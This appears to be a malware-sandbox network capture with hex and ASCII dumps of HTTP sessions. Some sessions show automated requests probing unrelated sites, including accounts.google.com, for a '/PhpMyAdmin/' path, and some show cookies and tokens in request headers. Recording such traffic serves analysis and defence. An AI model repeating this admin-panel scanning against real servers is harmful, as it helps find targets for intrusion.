                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC16376INData Raw: 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 75 6c 74 72 61 2e 63 73 73 3f 76 3d 33 39 30 30 2e 38 34 2e 30 2d 72 65 6c 2e 33 31 2b 61 65 64 66 66 38 32 22 20 69 64 3d 22 63 73 73 5f 30 22 3e 0a 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 75 69 2d 75 6c 74 72 61 2f 63 73 73 2f 6d 75 6c 74 69 5f 66 61 63 74 6f 72 5f 61 75 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_factor_aut
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC8INData Raw: 37 66 65 30 0d 0a 75 e1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7fe0u
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC16384INData Raw: b8 a5 61 72 72 61 6d 2c e1 b9 a2 61 66 61 72 2c 52 61 62 c4 ab ca bf 5c 27 61 6c 2d 41 77 77 61 6c 2c 52 61 62 c4 ab ca bf 5c 27 61 74 68 2d 54 68 c4 81 6e c4 ab 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 6c 2d c5 aa 6c c4 81 2c 4a 75 6d c4 81 64 c4 81 5c 27 61 74 68 2d 54 68 c4 81 6e 69 79 61 2c 52 61 6a 61 62 2c 53 68 61 ca bf 62 c4 81 6e 2c 52 61 6d 61 e1 b8 8d c4 81 6e 2c 53 68 61 77 77 c4 81 6c 2c 44 68 c5 ab 5c 27 61 6c 2d 51 61 ca bf 64 61 2c 44 68 c5 ab 5c 27 61 6c 2d e1 b8 a4 69 6a 6a 61 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 5b 27 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47 53 2e 47 52 45 45 54 49 4e 47 27 5d 20 3d 20 27 42 69 65 6e 76 65 6e 69 64 6f 2c 20 7b 31 7d 27 3b 0a 20 20 20 20 4c 4f 43 41 4c 45 5f 53 45 54 54 49 4e 47
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: arram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE_SETTING
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC16384INData Raw: 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 64 65 70 6c 6f 79 6d 65 6e 74 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 63 6f 6e 74 65 6e 74 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 70 6f 72 74 66 6f 6c 69 6f 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 22 4a 53 45 53 53 49 4f 4e 49 44 22 2c 20 22 2f 65 76 69 64 65 6e 63 65 5f 61 72 65 61 22 2c 20 6e 75 6c 6c 2c 20 74 72 75 65 29 3b 0d 0a 20 20 20 20 20 20 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: deleteCookie("JSESSIONID", "/deployment", null, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null, true); de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC12563INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 66 61 2d 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 6d 66 61 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 74 69 74 6c 65 22 20 3e 41 75 74 65 6e 74 69 63 61 63 69 c3 b3 6e 20 64 65 20 6d c3 ba 6c 74 69 70 6c 65 73 20 66 61 63 74 6f 72 65 73 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 74 6f 74 70 2d 76 65 72 69 66 69 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label for="totp-verific


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                213192.168.2.665421138.197.59.199443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC184OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=W9m9qKz7BTe7YTE1DP9qHQ2-.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                214192.168.2.66547847.251.24.188443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC315OUTGET /404 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; language=en|en; lng=en
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC362INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 52784
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                                                                                                                                                                                x-readtime: 13
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC3734INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 7c 69 65 2d 63 6f 6d 70 7c 69 65 2d 73 74 61 6e 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en" xmlns=""><head> <meta charset="UTF-8"> <meta name="renderer" content="webkit|ie-comp|ie-stand"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC37INData Raw: 39 2d 35 37 2f 73 74 61 74 69 63 2f 63 73 73 2f 68 6f 6d 65 2d 63 6f 6d 6d 6f 6e 2e 63 73 73 22 3e 0a 20 20 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9-57/static/css/home-common.css">
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 0a 20 20 3c 21 2d 2d 6c 6f 61 64 69 6e 67 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 72 6f 6e 74 65 6e 64 2e 63 6a 64 72 6f 70 73 68 69 70 70 69 6e 67 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2d 70 75 62 6c 69 63 2f 6c 6f 61 64 69 6e 67 2f 6c 6f 61 64 69 6e 67 2e 63 73 73 22 3e 0a 20 20 3c 21 2d 2d e5 85 ac e5 85 b1 e5 a4 b4 e9 83 a8 2d 2d 3e 0a 0a 20 20 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 72 6f 6e 74 65 6e 64 2e 63 6a 64 72 6f 70 73 68 69 70 70 69 6e 67 2e 63 6f 6d 2f 63 6a 2d 77 65 62 2d 65 67 67 2f 32 30 32 34 2d 30 31 2d 33 31 2d 30 34 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ...loading--> <link rel="stylesheet" href="https://frontend.cjdropshipping.com/common-public/loading/loading.css"> ...--> <link rel="stylesheet" type="text/css" href="https://frontend.cjdropshipping.com/cj-web-egg/2024-01-31-04-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 22 56 69 65 74 6e 61 6d 65 73 65 5c 22 2c 5c 22 63 6f 6d 6d 6f 6e 2d 74 6f 70 2d 63 6f 6e 66 69 72 6d 5c 22 3a 5c 22 43 6f 6e 66 69 72 6d 5c 22 2c 5c 22 63 6f 70 79 72 69 67 68 74 2d 63 6a 64 72 6f 70 73 68 69 70 70 69 6e 67 2e 63 6f 6d 2d 61 6c 6c 2d 72 69 67 68 74 73 2d 72 65 73 65 72 76 65 64 5c 22 3a 5c 22 43 4a 64 72 6f 70 73 68 69 70 70 69 6e 67 2e 63 6f 6d 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 5c 22 2c 5c 22 6c 61 6e 67 75 61 67 65 2d 63 72 6f 61 74 69 61 6e 5c 22 3a 5c 22 43 72 6f 61 74 69 61 6e 5c 22 2c 5c 22 66 6f 6f 74 65 72 2d 70 61 79 6d 65 6e 74 2d 6d 65 74 68 6f 64 73 5c 22 3a 5c 22 50 61 79 6d 65 6e 74 20 4d 65 74 68 6f 64 73 5c 22 2c 5c 22 6c 61 6e 67 75 61 67 65 2d 67 65 72 6d 61 6e 5c 22 3a 5c 22 47 65 72 6d 61 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "Vietnamese\",\"common-top-confirm\":\"Confirm\",\"copyright-cjdropshipping.com-all-rights-reserved\":\"CJdropshipping.com All Rights Reserved\",\"language-croatian\":\"Croatian\",\"footer-payment-methods\":\"Payment Methods\",\"language-german\":\"German
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 2d 61 6c 69 65 78 70 72 65 73 73 5c 22 3a 5c 22 47 6f 20 74 6f 20 41 6c 69 45 78 70 72 65 73 73 5c 22 2c 5c 22 6c 61 6e 67 75 61 67 65 2d 77 65 6c 73 68 5c 22 3a 5c 22 57 65 6c 73 68 5c 22 2c 5c 22 6c 61 6e 67 75 61 67 65 2d 73 65 72 62 69 61 6e 5c 22 3a 5c 22 53 65 72 62 69 61 6e 5c 22 2c 5c 22 66 6f 6f 74 65 72 2d 66 65 61 74 75 72 65 73 5c 22 3a 5c 22 46 65 61 74 75 72 65 73 5c 22 2c 5c 22 6c 61 6e 67 75 61 67 65 2d 70 6f 72 74 75 67 75 65 73 65 5c 22 3a 5c 22 50 6f 72 74 75 67 75 65 73 65 5c 22 2c 5c 22 74 6f 70 2d 6e 61 76 2d 73 6f 75 72 63 69 6e 67 5c 22 3a 5c 22 53 6f 75 72 63 69 6e 67 5c 22 2c 5c 22 63 6f 6d 6d 6f 6e 2d 74 6f 70 2d 73 6f 75 72 63 65 2d 6d 6f 72 65 5c 22 3a 5c 22 53 6f 75 72 63 65 20 4d 6f 72 65 5c 22 2c 5c 22 6c 61 6e 67 75 61 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -aliexpress\":\"Go to AliExpress\",\"language-welsh\":\"Welsh\",\"language-serbian\":\"Serbian\",\"footer-features\":\"Features\",\"language-portuguese\":\"Portuguese\",\"top-nav-sourcing\":\"Sourcing\",\"common-top-source-more\":\"Source More\",\"languag
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 73 74 20 70 72 6f 64 75 63 74 73 20 74 6f 20 79 6f 75 72 20 73 74 6f 72 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 2e 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 73 6f 75 72 63 65 2d 70 72 6f 64 75 63 74 73 2d 74 6f 2d 63 6a 2d 66 72 6f 6d 2d 31 36 38 38 2d 74 61 6f 62 61 6f 2d 61 6c 69 65 78 70 72 65 73 73 2e 5c 22 3a 5c 22 53 6f 75 72 63 65 20 70 72 6f 64 75 63 74 73 20 74 6f 20 43 4a 20 66 72 6f 6d 20 31 36 38 38 2c 20 54 61 6f 62 61 6f 2c 20 41 6c 69 65 78 70 72 65 73 73 2e 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 77 6f 72 6c 64 77 69 64 65 2d 77 61 72 65 68 6f 75 73 65 73 5c 22 3a 5c 22 57 6f 72 6c 64 77 69 64 65 20 57 61 72 65 68 6f 75 73 65 73 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 6a 69 6e 68 75 61 2d 77 61 72 65 68 6f 75 73 65 5c 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st products to your store automatically.\",\"intelGuid-source-products-to-cj-from-1688-taobao-aliexpress.\":\"Source products to CJ from 1688, Taobao, Aliexpress.\",\"intelGuid-worldwide-warehouses\":\"Worldwide Warehouses\",\"intelGuid-jinhua-warehouse\"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2219INData Raw: 62 69 6c 65 20 41 50 50 20 50 72 6f 63 65 73 73 69 6e 67 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 63 6a 2d 70 6c 61 74 66 6f 72 6d 5c 22 3a 5c 22 43 4a 20 50 6c 61 74 66 6f 72 6d 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 6d 61 6e 61 67 65 2d 61 6c 6c 2d 79 6f 75 72 2d 73 74 6f 72 65 73 2d 61 66 74 65 72 2d 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 2e 5c 22 3a 5c 22 4d 61 6e 61 67 65 20 61 6c 6c 20 79 6f 75 72 20 73 74 6f 72 65 73 20 61 66 74 65 72 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 2e 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 70 72 69 6e 74 2d 6f 6e 2d 64 65 6d 61 6e 64 5c 22 3a 5c 22 50 72 69 6e 74 20 6f 6e 20 44 65 6d 61 6e 64 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 70 72 6f 64 75 63 74 2d 63 6f 6e 6e 65 63 74 69 6f 6e 5c 22 3a 5c 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: bile APP Processing\",\"intelGuid-cj-platform\":\"CJ Platform\",\"intelGuid-manage-all-your-stores-after-authorization.\":\"Manage all your stores after authorization.\",\"intelGuid-print-on-demand\":\"Print on Demand\",\"intelGuid-product-connection\":\"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 5c 22 3a 5c 22 49 6e 76 65 6e 74 6f 72 79 20 41 6c 65 72 74 5c 22 2c 5c 22 68 6f 6d 65 2d 63 6a 2d 73 75 70 65 72 2d 64 65 61 6c 73 5c 22 3a 5c 22 43 4a 20 53 75 70 65 72 20 44 65 61 6c 73 5c 22 2c 5c 22 68 6f 6d 65 2d 70 65 6e 64 69 6e 67 2d 70 61 79 6d 65 6e 74 5c 22 3a 5c 22 50 65 6e 64 69 6e 67 20 50 61 79 6d 65 6e 74 5c 22 2c 5c 22 68 6f 6d 65 2d 64 69 73 70 61 74 63 68 65 64 5c 22 3a 5c 22 44 69 73 70 61 74 63 68 65 64 5c 22 2c 5c 22 68 6f 6d 65 2d 70 65 6e 64 69 6e 67 5c 22 3a 5c 22 50 65 6e 64 69 6e 67 5c 22 2c 5c 22 68 6f 6d 65 2d 63 6c 6f 73 65 64 5c 22 3a 5c 22 43 6c 6f 73 65 64 5c 22 2c 5c 22 68 6f 6d 65 2d 70 72 6f 63 65 73 73 69 6e 67 5c 22 3a 5c 22 50 72 6f 63 65 73 73 69 6e 67 5c 22 2c 5c 22 68 6f 6d 65 2d 61 77 61 69 74 69 6e 67 2d 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \":\"Inventory Alert\",\"home-cj-super-deals\":\"CJ Super Deals\",\"home-pending-payment\":\"Pending Payment\",\"home-dispatched\":\"Dispatched\",\"home-pending\":\"Pending\",\"home-closed\":\"Closed\",\"home-processing\":\"Processing\",\"home-awaiting-pa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 2d 68 65 61 64 65 72 2d 77 61 6c 6c 65 74 5c 22 3a 5c 22 57 61 6c 6c 65 74 5c 22 2c 5c 22 77 61 72 65 68 6f 75 73 65 2d 68 65 61 64 65 72 2d 74 6f 6f 6c 5c 22 3a 5c 22 54 6f 6f 6c 5c 22 2c 5c 22 74 72 61 6e 73 2d 47 65 72 6d 61 6e 5c 22 3a 5c 22 47 65 72 6d 61 6e 5c 22 2c 5c 22 77 61 72 65 68 6f 75 73 65 2d 68 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 5c 22 3a 5c 22 41 63 63 6f 75 6e 74 5c 22 2c 5c 22 6c 61 6e 2d 63 6f 6e 66 69 72 6d 5c 22 3a 5c 22 43 6f 6e 66 69 72 6d 5c 22 2c 5c 22 6d 6f 62 69 6c 65 2d 66 69 6c 74 65 72 2d 64 69 73 63 6f 75 6e 74 5c 22 3a 5c 22 53 70 65 63 69 61 6c 20 53 65 72 76 69 63 65 73 20 26 20 44 69 73 63 6f 75 6e 74 5c 22 2c 5c 22 43 4a 52 65 63 6f 6d 6d 6f 6e 64 61 74 69 6f 6e 2e 74 69 74 6c 65 5c 22 3a 5c 22 50 72 6f 64 75 63 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -header-wallet\":\"Wallet\",\"warehouse-header-tool\":\"Tool\",\"trans-German\":\"German\",\"warehouse-header-account\":\"Account\",\"lan-confirm\":\"Confirm\",\"mobile-filter-discount\":\"Special Services & Discount\",\"CJRecommondation.title\":\"Product
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC4096INData Raw: 6e 74 65 6c 47 75 69 64 2d 64 65 63 69 64 65 2d 68 6f 77 2d 74 6f 2d 73 65 74 2d 74 68 65 2d 74 72 61 63 6b 69 6e 67 2d 6e 75 6d 62 65 72 2d 73 79 6e 63 65 64 2d 74 6f 2d 79 6f 75 72 2d 73 70 65 63 69 66 69 63 2d 73 74 6f 72 65 2e 5c 22 3a 5c 22 44 65 63 69 64 65 20 68 6f 77 20 74 6f 20 73 65 74 20 74 68 65 20 74 72 61 63 6b 69 6e 67 20 6e 75 6d 62 65 72 20 73 79 6e 63 65 64 20 74 6f 20 79 6f 75 72 20 73 70 65 63 69 66 69 63 20 73 74 6f 72 65 2e 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d 73 68 69 70 2d 61 2d 62 75 6c 6b 2d 6f 66 2d 69 74 65 6d 73 2d 74 6f 2d 79 6f 75 72 2d 70 6c 61 63 65 2e 5c 22 3a 5c 22 53 68 69 70 20 61 20 62 75 6c 6b 20 6f 66 20 69 74 65 6d 73 20 74 6f 20 79 6f 75 72 20 70 6c 61 63 65 2e 5c 22 2c 5c 22 69 6e 74 65 6c 47 75 69 64 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ntelGuid-decide-how-to-set-the-tracking-number-synced-to-your-specific-store.\":\"Decide how to set the tracking number synced to your specific store.\",\"intelGuid-ship-a-bulk-of-items-to-your-place.\":\"Ship a bulk of items to your place.\",\"intelGuid-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                215192.168.2.665454142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
